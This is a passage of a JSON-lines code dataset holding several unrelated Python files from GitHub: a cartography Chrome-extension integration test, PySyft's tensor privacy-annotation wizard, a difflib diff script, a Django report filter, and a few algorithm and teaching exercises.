expected_nodes\n\n\ndef test_transform_and_load_user_extensions(neo4j_session):\n \"\"\"\n Ensure we can transform and load users and extension mapping.\n \"\"\"\n users_res = tests.data.crxcavator.crxcavator.USER_RESPONSE\n type(users_res)\n users_list, extensions_list, user_extensions_list = \\\n cartography.intel.crxcavator.crxcavator.transform_user_extensions(users_res)\n cartography.intel.crxcavator.crxcavator.load_user_extensions(\n users_list,\n user_extensions_list,\n neo4j_session,\n TEST_UPDATE_TAG,\n )\n\n query = \"\"\"\n MATCH(user:GSuiteUser{email:$GSuiteEmail})\n RETURN user.id, user.email\n \"\"\"\n expected_user_email = 'user@example.com'\n nodes = neo4j_session.run(query, GSuiteEmail=expected_user_email)\n\n actual_nodes = list(\n (\n n['user.email']\n ) for n in nodes\n )\n\n expected_nodes = list([\n (\n 'user@example.com'\n ),\n ])\n assert actual_nodes == expected_nodes\n\n\ndef test_user_to_extension(neo4j_session):\n \"\"\"\n Ensure that users are connected to extensions.\n \"\"\"\n _ensure_local_neo4j_has_test_extensions_data(neo4j_session)\n _ensure_local_neo4j_has_test_user_extensions_data(neo4j_session)\n query = \"\"\"\n MATCH(user:GSuiteUser)-[:INSTALLS]->(ext:ChromeExtension{id:$ExtensionId})\n RETURN user.email, ext.id, ext.name\n \"\"\"\n expected_extension_id = 'f06981cbc72a3c6e2e9e736cbdaef4865a4571bc|1.0'\n nodes = neo4j_session.run(\n query,\n ExtensionId=expected_extension_id,\n )\n actual_nodes = {\n (\n n['user.email'],\n n['ext.id'],\n n['ext.name'],\n ) for n in nodes\n }\n\n expected_nodes = {\n (\n 'user@example.com',\n 'f06981cbc72a3c6e2e9e736cbdaef4865a4571bc|1.0',\n 'CartographyIntegrationTest',\n ),\n }\n assert actual_nodes == expected_nodes\n","repo_name":"lyft/cartography","sub_path":"tests/integration/cartography/intel/crxcavator/test_crxcavator.py","file_name":"test_crxcavator.py","file_ext":"py","file_size_in_byte":5894,"program_lang":"python","lang":"en","doc_type":"code","stars":2765,"dataset":"github-code","pt":"52"} +{"seq_id":"12819137197","text":"def solution(answers):\n answer = []\n\n first_man = [1,2,3,4,5]\n second_man = [2,1,2,3,2,4,2,5]\n third_man = [3,3,1,1,2,2,4,4,5,5]\n\n first_count = cal_answer(first_man, answers)\n second_count = cal_answer(second_man, answers)\n third_count = cal_answer(third_man, answers)\n\n max_count = max(first_count, second_count, third_count)\n if first_count >= max_count:\n answer.append(1)\n if second_count >= max_count:\n answer.append(2)\n if third_count >= max_count:\n answer.append(3)\n\n return answer\n\n\ndef cal_answer(pattern, answers):\n correct_count = 0\n\n for i in range(len(answers)):\n correct_answer = answers[i]\n answer = pattern[i%len(pattern)]\n if correct_answer == answer:\n correct_count += 1\n\n return correct_count\n\n\nprint(solution([1,2,3,4,5]))\nprint(solution([1,3,2,4,2]))","repo_name":"galid1/Algorithm","sub_path":"python/programmers/level1/모의고사.py","file_name":"모의고사.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"70216750566","text":"from triangle import Triangle, EquilateralTriangle\nfrom rectangle import Rectangle, Square\nfrom circle import Circle\nfrom regular_pentagon import RegularPentagon\nfrom rhombus import Rhombus\n\ndef display_menu():\n user_input = input(\"Learn Geometry.\\n What do you want to do?\\n (1) Add new shape\\n (2) Show all shapes\\n (3) Show shape with the largest perimeter\\n (4) Show shape with the largest area\\n (5) Show 
formulas\\n (0) Exit program\\n\")\n return user_input\n\ndef inform_the_selection_is_invalid():\n print(\"\\nInvalid selection. Please select a number 0-5\\n\")\n\ndef choose_shape_type_to_add():\n shape_type = input(\"What shape would you like to add? \")\n if shape_type == \"circle\":\n r = float(input(\"Please enter the radius of the circle: \"))\n shape = Circle(r)\n\n elif shape_type == \"triangle\":\n a = float(input(\"Please enter the length of side a: \"))\n b = float(input(\"Please enter the length of side b: \"))\n c = float(input(\"Please enter the length of side c: \"))\n shape = Triangle(a, b, c)\n\n elif shape_type == \"equilateral triangle\":\n a = float(input(\"Please enter the side length of the triangle: \"))\n shape = EquilateralTriangle(a)\n\n elif shape_type == \"rectangle\":\n a = float(input(\"Please enter the width of the rectangle: \"))\n b = float(input(\"Please enter the height of the rectangle: \"))\n shape = Rectangle(a,b)\n\n elif shape_type == \"square\":\n a = float(input(\"Please enter the side length of the square: \"))\n shape = Square(a)\n \n elif shape_type == \"regular pentagon\":\n a = float(input(\"Please enter the side length of the pentagon: \"))\n shape = RegularPentagon(a)\n\n elif shape_type == \"rhombus\":\n a = float(input(\"Please enter the side length of the rhombus: \"))\n d1 = float(input(\"Please enter the first diagonal length: \"))\n d2 = float(input(\"Please enter the second diagonal length: \"))\n shape = Rhombus(a,d1,d2)\n\n else:\n print(\"Invalid shape name\")\n return choose_shape_type_to_add()\n print(f\"{shape} has been added to the list\")\n return shape\n \n \ndef show_formulas():\n shape = input(\"Formula of which shape would you like to see? \")\n if shape == \"circle\":\n circle = Circle(1)\n print_perimeter_and_area_formula(circle)\n\n elif shape == \"triangle\":\n triangle = Triangle(1,2,3)\n print_perimeter_and_area_formula(triangle)\n\n elif shape == \"equilateral triangle\":\n equilateral_triangle = EquilateralTriangle(1)\n print_perimeter_and_area_formula(equilateral_triangle)\n\n elif shape == \"rectangle\":\n rectangle = Rectangle(1,2)\n print_perimeter_and_area_formula(rectangle)\n\n elif shape == \"square\":\n square = Square(1)\n print_perimeter_and_area_formula(square)\n\n elif shape == \"regular pentagon\":\n regular_pentagon = RegularPentagon(1)\n print_perimeter_and_area_formula(regular_pentagon)\n\n elif shape == \"rhombus\":\n rhombus = Rhombus(1,2,3)\n print_perimeter_and_area_formula(rhombus)\n\n else:\n print(\"Invalid shape name\")\n return show_formulas()\n\ndef print_perimeter_and_area_formula(shape):\n print ((f\"perimeter formula: {shape.get_perimeter_formula()}\\narea formula: {shape.get_area_formula()}\"))","repo_name":"karostacho/Geometry_OOP","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70564660324","text":"# future\nfrom __future__ import annotations\n\n# stdlib\nimport textwrap\nfrom typing import Any\nfrom typing import List\nfrom typing import Optional\nfrom typing import Type\nimport uuid\n\n# third party\nfrom nacl.signing import VerifyKey\nimport numpy as np\nfrom numpy.typing import ArrayLike\n\n# relative\nfrom ..adp.entity import Entity\nfrom ..adp.vm_private_scalar_manager import VirtualMachinePrivateScalarManager\nfrom .manager import TensorChainManager\nfrom .passthrough import PassthroughTensor # type: ignore\nfrom .passthrough 
import is_acceptable_simple_type # type: ignore\n\n_SingleEntityPhiTensorRef = None\n\n\ndef _SingleEntityPhiTensor() -> Type[PassthroughTensor]:\n global _SingleEntityPhiTensorRef\n if _SingleEntityPhiTensorRef is None:\n # relative\n # relative\n from .autodp.single_entity_phi import SingleEntityPhiTensor\n\n _SingleEntityPhiTensorRef = SingleEntityPhiTensor\n return _SingleEntityPhiTensorRef\n\n\n_RowEntityPhiTensorRef = None\n\n\ndef _RowEntityPhiTensor() -> Type[PassthroughTensor]:\n global _RowEntityPhiTensorRef\n if _RowEntityPhiTensorRef is None:\n # relative\n # relative\n from .autodp.row_entity_phi import RowEntityPhiTensor\n\n _RowEntityPhiTensorRef = RowEntityPhiTensor\n return _RowEntityPhiTensorRef\n\n\n_AutogradTensorRef = None\n\n\ndef _AutogradTensor() -> Type[PassthroughTensor]:\n global _AutogradTensorRef\n if _AutogradTensorRef is None:\n # relative\n # relative\n from .autograd.tensor import AutogradTensor\n\n _AutogradTensorRef = AutogradTensor\n return _AutogradTensorRef\n\n\nclass AutogradTensorAncestor(TensorChainManager):\n \"\"\"Inherited by any class which might have or like to have AutogradTensor in its chain\n of .child objects\"\"\"\n\n @property\n def grad(self): # type: ignore\n child_gradient = self.child.grad\n if child_gradient is None:\n return None\n return self.__class__(child_gradient)\n\n @property\n def requires_grad(self) -> bool:\n return self.child.requires_grad\n\n def backward(self, grad=None): # type: ignore\n\n AutogradTensor = _AutogradTensor()\n\n # TODO: @Madhava question, if autograd(requires_grad=True) is not set\n # we still end up in here from AutogradTensorAncestor but child.backward\n # has no backprop_id\n if isinstance(self.child, AutogradTensorAncestor) or isinstance(\n self.child, AutogradTensor\n ):\n\n if grad is not None and not is_acceptable_simple_type(grad):\n grad = grad.child\n\n return self.child.backward(grad, backprop_id=uuid.uuid4()) # type: ignore\n else:\n raise Exception(\n \"No AutogradTensor found in chain, but backward() method called.\"\n )\n\n def autograd(self, requires_grad: bool = True) -> AutogradTensorAncestor:\n AutogradTensor = _AutogradTensor()\n\n self.push_abstraction_top(AutogradTensor, requires_grad=requires_grad) # type: ignore\n\n return self\n\n\ndef entity_creation_wizard(data: Any) -> List[Any]:\n\n w = textwrap.TextWrapper(initial_indent=\"\\t\", subsequent_indent=\"\\t\")\n\n welcome_msg = \"Welcome to the Data Subject Annotation Wizard!!!\"\n\n description1 = \"\"\"You've arrived here because you called Tensor.private() without passing in any entities!\nSince the purpose of .private() is to add metadata for the support of automatic differential\nprivacy budgeting, you need to describe which parts of your Tensor correspond to which\nreal-world data subjects (entities) whose privacy you want to protect. This is the only\nway the system knows, for example, that it costs twice as much privacy budget when twice\nas much of your data (say, 2 rows instead of 1 row) refer to the same entity.\"\"\"\n\n description2 = \"\"\"Entities can be people (such as a medical patient), places (such as a family's address), or\neven organizations (such as a business, state, or country). If you're not sure what kind of entity\nto include, just ask yourself the question, \"who am I trying to protect the privacy of?\". If it's\nan organization, make one entity per organization. 
If it's people, make one entity per person.\nIf it's a group of people who are somehow similar/linked to each other (such as a family),\nmake each entity a different group. For more information on differential privacy, see OpenMined's\ncourse on the subject: https://courses.openmined.org/\"\"\"\n\n    description3 = \"\"\"Since you didn't pass in entities into .private() (or you did so incorrectly), this wizard is\ngoing to guide you through the process of annotating your data with entities.\"\"\"\n\n    description4 = \"\"\"In this wizard, we're going to ask you for *unique identifiers* which refer to the entities\nin your data. While the unique identifiers need not be personal data (they can be random strings of letters and numbers\nif you like), it is ESSENTIAL that you use the same identifier when referring to the same entity in the\ndata, and that you never accidentally refer to two entities by the same identifier. Additionally, if you plan\nto do any kind of data JOIN with another dataset, it is ESSENTIAL that you are using the same unique\nidentifiers for entities as the data you're joining with. Since these unique identifiers may be personal\ninformation, PySyft might not be able to detect if two tensors are using different identifiers for the\nsame person.\"\"\"\n\n    description5 = \"\"\"So, in this tutorial we're going to be asking you to specify Unique Identifiers (UIDs) for each entity\nin your data. This could be an email, street address, or any other string that identifies someone\nuniquely in your data and in the data you intend to use with your data (if any).\"\"\"\n\n    print(\"\\t\" + \"=\" * 69)\n    print(w.fill(welcome_msg))\n    print(\"\\t\" + \"=\" * 69)\n    print()\n    print(w.fill(description1))\n    print()\n    print(w.fill(description2))\n    print()\n    print(w.fill(description3))\n    print()\n    print(w.fill(description4))\n    print()\n    print(w.fill(description5))\n    print()\n\n    print(\"\\tDo you understand, and are you ready to proceed? (yes/no)\")\n    print()\n    consent = str(input(\"\\t\"))\n    print()\n\n    if consent == \"no\":\n        raise Exception(\"User cancelled entity creation wizard!\")\n\n    print(\"\\tExcellent! Let's begin!\")\n    # print(\"\\tYou passed in a tensor with the shape:\" + str(data.shape))\n    print()\n\n    print(\"\\t\" + \"-\" * 69)\n    print()\n\n    print(w.fill(\"Question 1: Is this entire tensor referring to the same entity?\"))\n    print()\n    print(w.fill(\"Examples:\"))\n    print(\"\\t - a single medical scan of one patient\")\n    print(\"\\t - a single spreadsheet of proprietary statistics about a business\")\n    print(\"\\t - a tensor of facts about a country\")\n    print()\n    print(\n        w.fill(\n            \"\"\"(if the tensor is about one entity, but it also contains multiple other entities within,\nsuch as a tensor about all the customers of one business, ask yourself, are you trying to\nprotect the people or the business)\"\"\"\n        )\n    )\n    print()\n    print(\n        w.fill(\n            \"If yes, write the UID of the entity this data is about, otherwise write 'no' \"\n            \" because this data is about more than one entity.\"\n        )\n    )\n    print()\n    single_uid = input(\"\\t\")\n    print()\n    if single_uid != \"no\":\n        print(\"\\t\" + \"-\" * 69)\n        print()\n        print(\n            w.fill(\n                \"Excellent! Your data will be annotated as referring to:\"\n                + str(single_uid)\n            )\n        )\n        print()\n        print(\n            w.fill(\n                \"Congratulations! 
You're all done with the Data Subject Annotation Wizard!!!\"\n                \" In the future, you can accomplish this without the wizard by running:\"\n            )\n        )\n        print()\n        print(w.fill(\"\\t.private(entities='\" + str(single_uid) + \"')\"))\n        print()\n        print(\"\\t\" + \"=\" * 69)\n        return [single_uid]\n\n    print(\"\\t\" + \"-\" * 69)\n    print()\n    print(\n        w.fill(\n            \"Question 2: Does each row correspond to an entity, perhaps with occasional repeats (yes/no)?\"\n        )\n    )\n    print()\n    answer = str(input(\"\\t\"))\n    print()\n    print(\"\\t\" + \"-\" * 69)\n    print()\n    if answer == \"yes\":\n        print(\n            w.fill(\n                \"Question 3: Excellent! Well, since your dataset has \"\n                + str(data.shape[0])\n                + \" rows, \"\n                + \"would you like to hand-enter an entity for each one (yes) or if there are too \"\n                + \"many for you to hand-enter, we'll print some example code for you to run (no).\"\n            )\n        )\n\n        print()\n\n        answer = str(input(\"\\t\"))\n\n        if answer == \"yes\":\n\n            print()\n\n            entities = list()\n            for i in range(len(data)):\n                print(\"\\t\\t\" + \"-\" * 61)\n                print()\n                print(w.fill(\"\\tData Row \" + str(i) + \":\" + str(data[i])))\n                ent = input(\"\\t\\t What entity is this row about:\")\n                entities.append(ent)\n            print()\n            print(\"\\t\\t\" + \"-\" * 61)\n            print()\n            print(\n                w.fill(\n                    \"All done! Next time if you want to skip the wizard, call .private() like this:\"\n                )\n            )\n            print()\n            print(\n                w.fill(\n                    \".private(entities=['\"\n                    + entities[0]\n                    + \"', '\"\n                    + entities[1]\n                    + \"', '\"\n                    + entities[-1]\n                    + \"'])\"\n                )\n            )\n            print()\n            print(\n                w.fill(\n                    \" where you pass in entities as a list of strings, one per row. As long as you\"\n                    \" pass in the same number of entities as there are rows in your tensor, it will\"\n                    \" automatically detect this and assume you mean one entity per row.\"\n                )\n            )\n            return entities\n\n        elif answer == \"no\":\n\n            print()\n\n            print(\n                w.fill(\n                    \"Excellent. Well, in that case you'll need to re-run .private() but pass in\"\n                    \" a list of strings where each string is a unique identifier for an entity, and where\"\n                    \" the length of the list is equal to the number of rows in your tensor. Like so:\"\n                )\n            )\n\n            print()\n            print(w.fill(\".private(entities=['bob', 'alice', 'john'])\"))\n            print()\n            print(\n                \" Now just to make sure I don't corrupt your tensor - I'm going to throw an exception.\"\n            )\n            print()\n            raise Exception(\n                \"Wizard aborted. Please run .private(entities=)\"\n                \" again with your list of entity unique identifiers (strings),\"\n                \" one per row of your tensor.\"\n            )\n    elif answer == \"no\":\n\n        print(w.fill(\"Question 3: Is your data one entity for every column (yes/no)?\"))\n\n        print()\n\n        answer = str(input(\"\\t\"))\n\n        print()\n\n        if answer == \"yes\":\n            print(\n                w.fill(\n                    \"We don't yet support this form of ingestion. Please transpose your data\"\n                    \" into one entity per row and re-run the wizard. Aborting:)\"\n                )\n            )\n\n            raise Exception(\"Wizard aborted.\")\n\n        elif answer == \"no\":\n\n            print(\n                w.fill(\n                    \"It sounds like your tensor is a random assortment of entities (and perhaps empty/non-entities). \"\n                    \"If you have empty values, just create random entities for them for now. 
If you have various \"\n                    \"entities scattered throughout your tensor (not organized by row), then you'll need to pass \"\n                    \"in a np.ndarray of strings which is identically shaped to your data in entities like so:\"\n                )\n            )\n\n            print()\n            print(\"\\t\\ttensor = sy.Tensor(np.ones((2,2)).astype(np.int32))\")\n            print()\n            print(\"\\t\\tentities = np.array([['bob', 'alice'],['charlie', 'danielle']])\")\n            print()\n            print(\"\\t\\ttensor.private(min_val=0, max_val=1, entities=entities))\")\n            print()\n            print(\n                \"Aborting wizard now so that you can re-run .private with the right parameters.\"\n            )\n            print()\n            raise Exception(\n                \"Wizard aborted. Please run .private(entities=)\"\n                \" again with your np.ndarray of entity unique identifiers (strings),\"\n                \" one per value of your tensor and where your np.ndarray of entities is\"\n                \" the same shape as your data.\"\n            )\n    print()\n\n    print(\"\\t\" + \"_\" * 69)\n    raise Exception(\n        \"Not sure what happened... this code shouldn't have been reached. Try answering questions with \"\n        \"options given by the prompts (such as yes/no).\"\n    )\n\n\nclass PhiTensorAncestor(TensorChainManager):\n    \"\"\"Inherited by any class which might have or like to have SingleEntityPhiTensor in its chain\n    of .child objects\"\"\"\n\n    def __init__(self, child: Any) -> None:\n        self.child = child\n\n    @property\n    def shape(self) -> List[int]:\n        return self.child.shape\n\n    @property\n    def min_vals(self): # type: ignore\n        return self.__class__(self.child.min_vals)\n\n    @property\n    def max_vals(self): # type: ignore\n        return self.__class__(self.child.max_vals)\n\n    @property\n    def gamma(self): # type: ignore\n        return self.__class__(self.child.gamma)\n\n    def publish(self, acc: Any, sigma: float, user_key: VerifyKey) -> PhiTensorAncestor:\n        return self.__class__(\n            self.child.publish(acc=acc, sigma=sigma, user_key=user_key)\n        )\n\n    def copy(self) -> PhiTensorAncestor:\n        \"\"\"This should certainly be implemented by the subclass but adding this here to satisfy mypy.\"\"\"\n\n        return NotImplemented\n\n    def private(\n        self,\n        min_val: ArrayLike,\n        max_val: ArrayLike,\n        scalar_manager: VirtualMachinePrivateScalarManager = VirtualMachinePrivateScalarManager(),\n        entities: Optional[Any] = None,\n        skip_blocking_checks: bool = False,\n    ) -> PhiTensorAncestor:\n\n        return self.copy()._private(\n            min_val=min_val,\n            max_val=max_val,\n            scalar_manager=scalar_manager,\n            entities=entities,\n            skip_blocking_checks=skip_blocking_checks,\n        )\n\n    def _private(\n        self,\n        min_val: ArrayLike,\n        max_val: ArrayLike,\n        scalar_manager: VirtualMachinePrivateScalarManager = VirtualMachinePrivateScalarManager(),\n        entities: Optional[Any] = None,\n        skip_blocking_checks: bool = False,\n    ) -> PhiTensorAncestor:\n        \"\"\" \"\"\"\n\n        # PHASE 1: RUN CHECKS\n\n        # Check 1: Is self.child a compatible type? We only support DP and SMPC for a few types.\n        if (\n            not isinstance(self.child, np.ndarray)\n            or getattr(self.child, \"dtype\", None) != np.int32\n        ):\n\n            msg = (\n                \"At present, you can only call .private() \"\n                + \"on syft.Tensor objects wrapping np.int32 arrays. 
You called it on a \"\n                + \"syft.Tensor wrapping a \"\n                + str(type(self.child))\n            )\n\n            if isinstance(self.child, np.ndarray):\n                msg += \" with dtype:\" + str(getattr(self.child, \"dtype\", None))\n\n            raise TypeError(msg)\n\n        # Check 2: If entities == None, then run the entity creation tutorial\n        if entities is None:\n\n            if skip_blocking_checks:\n                raise Exception(\n                    \"Error: 'entities' argument to .private() must not be None!\"\n                )\n            print(\n                \"ALERT: You didn't pass in any entities. Launching entity wizard...\\n\"\n            )\n            entities = entity_creation_wizard(self.child)\n\n        # Check 3: If entities is a string, make it a list with one entity in it\n        if isinstance(entities, str):\n            entities = [Entity(entities)]\n        elif isinstance(entities, Entity):\n            entities = [entities]\n\n        # Check 4: If entities is a list, check whether the items are strings or Entity objects.\n        # If they're strings, let's create Entity objects.\n        elif isinstance(entities, list):\n            _entities = list()\n            for e in entities:\n                if isinstance(e, str):\n                    _entities.append(Entity(e))\n                elif isinstance(e, Entity):\n                    _entities.append(e)\n                elif isinstance(e, (list, np.ndarray)):\n                    # looks like it's actually a list of tensors, let's try to\n                    # cast the whole thing to an ndarray and see if that works.\n                    entities = np.array(entities)\n                    break\n                else:\n                    raise Exception(\"What kind of entity is this?!\")\n\n            entities = _entities\n\n        elif isinstance(entities, np.ndarray):\n            if entities.shape != self.shape:\n                raise Exception(\n                    \"Entities shape doesn't match data shape. If you're\"\n                    \" going to pass in something other than 1 entity for the\"\n                    \" entire tensor or one entity per row, you're going to need\"\n                    \" to make the np.ndarray of entities have the same shape as\"\n                    \" the tensor you're calling .private() on. Try again.\"\n                )\n        else:\n\n            raise Exception(\n                \"We don't yet support passing in a tensor of arbitrary entities. \"\n                \"For now, call .flatten() on your tensor so you have one entity per row, \"\n                \"or split your tensor into separate tensors for each value. 
We apologize \"\n                \"for the inconvenience and will be adding this functionality soon!\"\n            )\n\n        # PHASE 2: CREATE CHILD\n        if len(entities) == 1:\n            # if there's only one entity - push a SingleEntityPhiTensor\n\n            if isinstance(min_val, (float, int)):\n                min_vals = (self.child * 0) + min_val\n            else:\n                raise Exception(\n                    \"min_val should be a float, got \" + str(type(min_val)) + \" instead.\"\n                )\n\n            if isinstance(max_val, (float, int)):\n                max_vals = (self.child * 0) + max_val\n            else:\n                raise Exception(\n                    \"max_val should be a float, got \" + str(type(max_val)) + \" instead.\"\n                )\n\n            self.push_abstraction_top(\n                _SingleEntityPhiTensor(),\n                entity=entities[0], # type: ignore\n                min_vals=min_vals,\n                max_vals=max_vals,\n                scalar_manager=scalar_manager, # type: ignore\n            )\n\n        # if there's row-level entities - push a RowEntityPhiTensor\n        elif entities is not None and len(entities) == self.shape[0]:\n\n            class_type = _SingleEntityPhiTensor()\n\n            new_list = list()\n            for i, entity in enumerate(entities):\n\n                if isinstance(min_val, (float, int)):\n                    min_vals = (self.child[i : i + 1] * 0) + min_val # noqa: E203\n                else:\n                    raise Exception(\n                        \"min_val should be a float, got \"\n                        + str(type(min_val))\n                        + \" instead.\"\n                    )\n\n                if isinstance(max_val, (float, int)):\n                    max_vals = (self.child[i : i + 1] * 0) + max_val # noqa: E203\n                else:\n                    raise Exception(\n                        \"max_val should be a float, got \"\n                        + str(type(max_val))\n                        + \" instead.\"\n                    )\n\n                value = self.child[i : i + 1] # noqa: E203\n\n                new_list.append(\n                    class_type(\n                        child=value,\n                        entity=entity,\n                        min_vals=min_vals,\n                        max_vals=max_vals,\n                        scalar_manager=scalar_manager,\n                    )\n                )\n\n            self.replace_abstraction_top(_RowEntityPhiTensor(), rows=new_list) # type: ignore\n\n        # TODO: if there's element-level entities - push all elements with PhiScalars\n        else:\n\n            raise Exception(\n                \"If you're passing in multiple entities, please pass in one entity per row.\"\n            )\n\n        return self\n","repo_name":"datax-io/pysyft-parcel","sub_path":"packages/syft/src/syft/core/tensor/ancestors.py","file_name":"ancestors.py","file_ext":"py","file_size_in_byte":20888,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"20631801036","text":"import difflib\nimport sys\nimport webbrowser\n\ntry:\n    text_file_1 = sys.argv[1]\n    print(\"text_file_1: \" + text_file_1)\n    text_file_2 = sys.argv[2]\n    print(\"text_file_2: \" + text_file_2)\nexcept Exception as e:\n    print(\"Error: \" + str(e))\n    print(\"Usage: diff.py file_name1 file_name2\")\n    sys.exit()\n\ndef read_file(filename):\n    try:\n        file_handle = open(filename, 'r')\n        text = file_handle.read().splitlines()\n        file_handle.close()\n        return text\n    except IOError as error:\n        print(\"Read file Error: \" + str(error))\n        sys.exit()\n\nif text_file_1 == \"\" or text_file_2 == \"\":\n    print(\"Usage: diff.py file_name1 file_name2\")\n    sys.exit()\n\ntext1_lines = read_file(text_file_1)\ntext2_lines = read_file(text_file_2)\nd = difflib.HtmlDiff()\n# print(d.make_file(text1_lines, text2_lines))\n\ndiff_result_html = open('diff_result.html', 'w', encoding='utf-8')\ndiff_result_html.write(d.make_file(text1_lines, text2_lines))\nwebbrowser.open('diff_result.html')\n","repo_name":"python012/garrulous_python","sub_path":"diff/diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"23704604000","text":"\"\"\"\n=============================================================\n\n~/tfat/filters/report_filter.py\nCreated: Jul-05-2021 16:27\n\nDESCRIPTION:\n\nFilters for TFAT Tag Reports\n\nA. Cottrill\n=============================================================\n\"\"\"\n\n\nimport django_filters\nfrom tfat.models import Report\n\nfrom ..utils import ValueInFilter\n\n\nclass ReportFilter(django_filters.FilterSet):\n\n lake = ValueInFilter(field_name=\"recoveries__lake__abbrev\", lookup_expr=\"in\")\n lake__not = ValueInFilter(field_name=\"recoveries__lake__abbrev\", exclude=True)\n\n spc = ValueInFilter(field_name=\"recoveries__species__spc\", lookup_expr=\"in\")\n spc__not = ValueInFilter(field_name=\"recoveries__species__spc\", exclude=True)\n\n report_year = django_filters.NumberFilter(\n field_name=\"report_date\", lookup_expr=\"year\"\n )\n report_year__gte = django_filters.NumberFilter(\n field_name=\"report_date\", lookup_expr=\"year__gte\"\n )\n report_year__lte = django_filters.NumberFilter(\n field_name=\"report_date\", lookup_expr=\"year__lte\"\n )\n\n report_year__gt = django_filters.NumberFilter(\n field_name=\"report_date\", lookup_expr=\"year__gt\"\n )\n report_year__lt = django_filters.NumberFilter(\n field_name=\"report_date\", lookup_expr=\"year__lt\"\n )\n\n from_dcr = django_filters.BooleanFilter(\n field_name=\"dcr\", lookup_expr=\"isnull\", exclude=True\n )\n\n class Meta:\n model = Report\n fields = [\n \"recoveries__lake__abbrev\",\n \"recoveries__species__spc\",\n \"report_date\",\n \"dcr\",\n ]\n","repo_name":"AdamCottrill/TFAT","sub_path":"tfat/filters/report_filter.py","file_name":"report_filter.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2037724708","text":"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n'***************************** Jewel Mahmud *****************************'\n'***************************** CSE-13th,MBSTU *****************************'\n'***************************** Date: 31-10-2021 *****************************'\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# Base class\nclass Grandfather:\n def __init__(self, grandfathername):\n self.grandfathername = grandfathername\n \n# Intermediate class\nclass Father(Grandfather):\n def __init__(self, fathername, grandfathername):\n self.fathername = fathername\n \n # invoking constructor of Grandfather class\n Grandfather.__init__(self, grandfathername)\n \n# Derived class\nclass Son(Father):\n def __init__(self,sonname, fathername, grandfathername):\n self.sonname = sonname\n \n # invoking constructor of Father class\n Father.__init__(self, fathername, grandfathername)\n \n def print_name(self):\n print('Grandfather name :', self.grandfathername)\n print(\"Father name :\", self.fathername)\n print(\"Son name :\", self.sonname)\n \n# Driver code\ns1 = Son('Jahid', 'Menu Mia', 'Abdur Rashid')\n# print(s1.grandfathername)\ns1.print_name()","repo_name":"MahmudJewel/Python-practice","sub_path":"OOP/4-multilevel inheritance.py","file_name":"4-multilevel inheritance.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} 
+{"seq_id":"26886537840","text":"#==================================================\n#==> Title: trapping-rain-water\n#==> Author: Zhang zhen \n#==> Email: hustmatnoble.gmail.com\n#==> GitHub: https://github.com/MatNoble\n#==> Date: 1/20/2021\n#==================================================\n\n\"\"\"\nhttps://leetcode-cn.com/problems/trapping-rain-water/\n\"\"\"\n\nclass Solution:\n def trapBruteForce(self, height):\n if not height: return 0\n res, n = 0, len(height)\n for i in range(n):\n l_max, r_max = 0, 0\n j = i\n while j >= 0:\n l_max = max(height[j], l_max)\n j -= 1\n j = i\n while j < n:\n r_max = max(height[j], r_max)\n j += 1\n res += min(l_max, r_max) - height[i]\n return res\n\n def trap(self, height):\n if not height: return 0\n res, n = 0, len(height)\n l_max, r_max = [height[0]]*n, [height[-1]]*n\n for i in range(1, n):\n l_max[i] = max(height[i], l_max[i-1])\n j = n-i-1\n r_max[j] = max(height[j], r_max[j+1])\n for i in range(n):\n res += min(l_max[i], r_max[i]) - height[i]\n return res\n\n def trapOptimal(self, height):\n if not height: return 0\n res, n = 0, len(height)\n left, right = 0, n-1\n l_max, r_max = height[0], height[-1]\n while left <= right:\n l_max = max(l_max, height[left])\n r_max = max(r_max, height[right])\n if l_max < r_max:\n res += l_max - height[left]\n left += 1\n else:\n res += r_max - height[right]\n right -= 1\n return res\n\nheight = [0,1,0,2,1,0,1,3,2,1,2,1]\nmat = Solution()\nprint(mat.trapBruteForce(height))\nprint(mat.trap(height))\nprint(mat.trapOptimal(height))\n","repo_name":"MatNoble/leetcode","sub_path":"LeetCodeSolutions/042.py","file_name":"042.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"23078105688","text":"from matrix_utils import *\nfrom matrix_GE import *\nfrom matrix_SOLE import *\nfrom cmu_112_graphics import *\nfrom animation_classes import *\nfrom animation_helpers import *\n\ndef appStarted(app):\n fitToScreen(app)\n screensInit(app)\n\n # app.buttons indices:\n # 0: home, 1: calc\n app.buttons = [[],[]]\n backHomeButtonInit(app)\n backButtonInit(app)\n solveButtonInit(app)\n clearButtonInit(app)\n stepsButtonInit(app)\n\n # *** VALID KEYS ***\n app.numKeys = {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '.', '-'}\n app.entryNavKeys = {'Up': -1, 'Down': +1, 'Left': -1, 'Right': +1}\n app.scrollKeys = {'Up': +10, 'Down': -10}\n\n # scrolling\n app.scrollY = 0\n\n # app.textBoxes indices:\n # 0: add, 1: mult, 2: tpose, 3: GE, 4: SOLE, 5: det, 6: dirGraph\n # innermost list stores dimension Text Boxes\n app.textBoxes = [[[]], [[],[]], [[]], [[]], [[]], [[]], [[]]]\n\n # Screen initializations\n 